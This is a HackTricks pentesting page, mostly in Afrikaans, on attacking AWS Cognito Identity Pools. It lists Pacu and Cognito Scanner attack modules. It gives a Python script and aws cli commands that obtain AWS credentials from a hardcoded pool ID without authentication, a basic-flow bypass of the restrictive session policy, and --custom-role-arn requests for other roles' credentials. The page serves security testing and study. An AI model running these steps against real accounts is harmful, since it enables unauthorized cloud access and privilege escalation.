Cognito Identity Pools

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Basic Information

Identiteitspoele speel 'n belangrike rol deur jou gebruikers in staat te stel om tydelike geloofsbriewe te verkry. Hierdie geloofsbriewe is noodsaaklik om toegang te verkry tot verskeie AWS-dienste, insluitend maar nie beperk tot Amazon S3 en DynamoDB nie. 'n Opmerkelijke kenmerk van identiteitspoele is hul ondersteuning vir beide anonieme gasgebruikers en 'n verskeidenheid identiteitsverskaffers vir gebruikersverifikasie. Die ondersteunde identiteitsverskaffers sluit in:

Amazon Cognito gebruikerspoele
Sosiale aanmeldopsies soos Facebook, Google, Login with Amazon, en Sign in with Apple
Verskaffers wat voldoen aan OpenID Connect (OIDC)
SAML (Security Assertion Markup Language) identiteitsverskaffers
Ontwikkelaar geverifieerde identiteite

# Sample code to demonstrate how to integrate an identity provider with an identity pool can be structured as follows:
import boto3

# Initialize the Amazon Cognito Identity client
client = boto3.client('cognito-identity')

# Assume you have already created an identity pool and obtained the IdentityPoolId
identity_pool_id = 'your-identity-pool-id'

# Add an identity provider to the identity pool
response = client.set_identity_pool_roles(
IdentityPoolId=identity_pool_id,
Roles={
'authenticated': 'arn:aws:iam::AWS_ACCOUNT_ID:role/AuthenticatedRole',
'unauthenticated': 'arn:aws:iam::AWS_ACCOUNT_ID:role/UnauthenticatedRole',
}
)

# Print the response from AWS
print(response)

Cognito Sync

Om Identiteit Pool sessies te genereer, moet jy eers 'n Identiteit ID genereer. Hierdie Identiteit ID is die identifikasie van die sessie van daardie gebruiker. Hierdie identifikasies kan tot 20 datasets hê wat tot 1MB van sleutel-waarde pare kan stoor.

Dit is nuttig om inligting van 'n gebruiker te hou (wat altyd dieselfde Identiteit ID sal gebruik).

Boonop is die diens cognito-sync die diens wat toelaat om hierdie inligting te bestuur en te sinkroniseer (in die datasets, inligting in strome en SNS boodskappe te stuur...).

Tools for pentesting

Pacu, die AWS eksploitering raamwerk, sluit nou die "cognito__enum" en "cognito__attack" modules in wat die enumerasie van alle Cognito bates in 'n rekening outomatiseer en swak konfigurasies, gebruikersattributen wat vir toegangbeheer gebruik word, ens., merk, en outomatiseer ook gebruikersskepping (insluitend MFA-ondersteuning) en privilige-eskalasie gebaseer op veranderbare pasgemaakte attributen, bruikbare identiteits pool akkrediteer, aanneembare rolle in id tokens, ens.

Vir 'n beskrywing van die modules se funksies, sien deel 2 van die blog pos. Vir installasie instruksies, sien die hoof Pacu bladsy.

Usage

Voorbeeld van cognito__attack gebruik om te probeer om 'n gebruiker te skep en alle privesc vektore teen 'n gegewe identiteits pool en gebruikerspool kliënt:

Pacu (new:test) > run cognito__attack --username randomuser --email XX+sdfs2@gmail.com --identity_pools
us-east-2:a06XXXXX-c9XX-4aXX-9a33-9ceXXXXXXXXX --user_pool_clients
59f6tuhfXXXXXXXXXXXXXXXXXX@us-east-2_0aXXXXXXX

Voorbeeld cognito__enum gebruik om al die gebruikerspoele, gebruikerspoel kliënte, identiteitspoele, gebruikers, ens. wat sigbaar is in die huidige AWS-rekening, te versamel:

Pacu (new:test) > run cognito__enum

Cognito Scanner is 'n CLI-gereedskap in python wat verskillende aanvalle op Cognito implementeer, insluitend ongewenste rekening skep en identiteitspoel eskalasie.

Installasie

$ pip install cognito-scanner

Gebruik

$ cognito-scanner --help

For more information check https://github.com/padok-team/cognito-scanner

Toegang tot IAM Rolle

Ongeoutentiseerde

Die enigste ding wat 'n aanvaller moet weet om AWS kredensiale in 'n Cognito-app as 'n ongeoutentiseerde gebruiker te verkry, is die Identiteitspoel-ID, en hierdie ID moet hardgecodeer wees in die web/mobiele toepassing sodat dit dit kan gebruik. 'n ID lyk soos volg: eu-west-1:098e5341-8364-038d-16de-1865e435da3b (dit is nie bruteforceerbaar nie).

Die IAM Cognito ongeoutentiseerde rol wat via geskep is, word standaard genoem Cognito_<Identiteitspoel naam>Unauth_Role

As jy 'n Identiteitspoel-ID hardgecodeer vind en dit ongeoutentiseerde gebruikers toelaat, kan jy AWS kredensiale verkry met:

import requests

region = "us-east-1"
id_pool_id = 'eu-west-1:098e5341-8364-038d-16de-1865e435da3b'
url = f'https://cognito-identity.{region}.amazonaws.com/'
headers = {"X-Amz-Target": "AWSCognitoIdentityService.GetId", "Content-Type": "application/x-amz-json-1.1"}
params = {'IdentityPoolId': id_pool_id}

r = requests.post(url, json=params, headers=headers)
json_resp = r.json()

if not "IdentityId" in json_resp:
print(f"Not valid id: {id_pool_id}")
exit

IdentityId = r.json()["IdentityId"]

params = {'IdentityId': IdentityId}

headers["X-Amz-Target"] = "AWSCognitoIdentityService.GetCredentialsForIdentity"
r = requests.post(url, json=params, headers=headers)

print(r.json())

Of jy kan die volgende aws cli commands gebruik:

aws cognito-identity get-id --identity-pool-id <identity_pool_id> --no-sign
aws cognito-identity get-credentials-for-identity --identity-id <identity_id> --no-sign

Let daarop dat 'n nie-geverifieerde cognito gebruiker NIE enige toestemming kan hê nie, selfs al is dit via 'n beleid toegeken. Kyk na die volgende afdeling.

Verbeterde vs Basiese Verifikasievloei

Die vorige afdeling het die standaard verbeterde verifikasievloei gevolg. Hierdie vloei stel 'n beperkende sessiebeleid in op die IAM rol sessie wat gegenereer is. Hierdie beleid sal slegs toelaat dat die sessie die dienste van hierdie lys gebruik (selfs al het die rol toegang tot ander dienste).

Daar is egter 'n manier om dit te omseil, as die Identiteitspoel "Basiese (Klassieke) Vloei" geaktiveer het, sal die gebruiker in staat wees om 'n sessie te verkry met behulp van daardie vloei wat nie daardie beperkende sessiebeleid sal hê nie.

# Get auth ID
aws cognito-identity get-id --identity-pool-id <identity_pool_id> --no-sign

# Get login token
aws cognito-identity get-open-id-token --identity-id <identity_id> --no-sign

# Use login token to get IAM session creds
## If you don't know the role_arn use the previous enhanced flow to get it
aws sts assume-role-with-web-identity --role-arn "arn:aws:iam::<acc_id>:role/<role_name>" --role-session-name sessionname --web-identity-token <token> --no-sign

As jy hierdie fout ontvang, is dit omdat die basiese vloei nie geaktiveer is (standaard)

An error occurred (InvalidParameterException) when calling the GetOpenIdToken operation: Basic (classic) flow is not enabled, please use enhanced flow.

As jy 'n stel IAM-akkrediteerings het, moet jy watter toegang jy het nagaan en probeer om privileges te verhoog.

Geverifieer

Onthou dat geverifieerde gebruikers waarskynlik verskillende toestemmings toegeken sal word, so as jy kan aanmeld binne die app, probeer dit en kry die nuwe akkrediteerings.

Daar kan ook rolle beskikbaar wees vir geverifieerde gebruikers wat toegang tot die Identiteitspoel het.

Hiervoor mag jy toegang tot die identiteitsverskaffer nodig hê. As dit 'n Cognito-gebruikerspoel is, kan jy dalk die standaardgedrag misbruik en self 'n nuwe gebruiker skep.

Die IAM Cognito geverifieerde rol wat geskep is, word standaard Cognito_<Identiteitspoel naam>Auth_Role genoem

In elk geval, die volgende voorbeeld verwag dat jy reeds binne 'n Cognito-gebruikerspoel aangemeld het wat gebruik word om toegang tot die Identiteitspoel te verkry (moet nie vergeet dat ander tipes identiteitsverskaffers ook gekonfigureer kan word nie).

aws cognito-identity get-id \
--identity-pool-id <identity_pool_id> \
--logins cognito-idp.<region>.amazonaws.com/<YOUR_USER_POOL_ID>=<ID_TOKEN>

# Kry die identity_id van die vorige opdrag se antwoord
aws cognito-identity get-credentials-for-identity \
--identity-id <identity_id> \
--logins cognito-idp.<region>.amazonaws.com/<YOUR_USER_POOL_ID>=<ID_TOKEN>


# In die IdToken kan jy rolle vind waartoe 'n gebruiker toegang het as gevolg van Gebruikerspoel Groepe
# Gebruik die --custom-role-arn om akkrediteerings vir 'n spesifieke rol te kry
aws cognito-identity get-credentials-for-identity \
--identity-id <identity_id> \
    --custom-role-arn <role_arn> \
    --logins cognito-idp.<region>.amazonaws.com/<YOUR_USER_POOL_ID>=<ID_TOKEN>

Dit is moontlik om verskillende IAM rolle te konfigureer afhangende van die identiteitsverskaffer waarteen die gebruiker aangemeld is of selfs net afhangende van die gebruiker (met behulp van aansprake). Daarom, as jy toegang het tot verskillende gebruikers deur dieselfde of verskillende verskaffers, kan dit die moeite werd wees om aan te meld en toegang te verkry tot die IAM rolle van al hulle.

Ondersteun HackTricks

Kyk na die subskripsie planne!
Sluit aan by die 💬 Discord groep of die telegram groep of volg ons op Twitter 🐦 @hacktricks_live.
Deel hacking truuks deur PRs in te dien na die HackTricks en HackTricks Cloud github repos.

PreviousAWS - Cognito Enum NextCognito User Pools

Last updated 3 days ago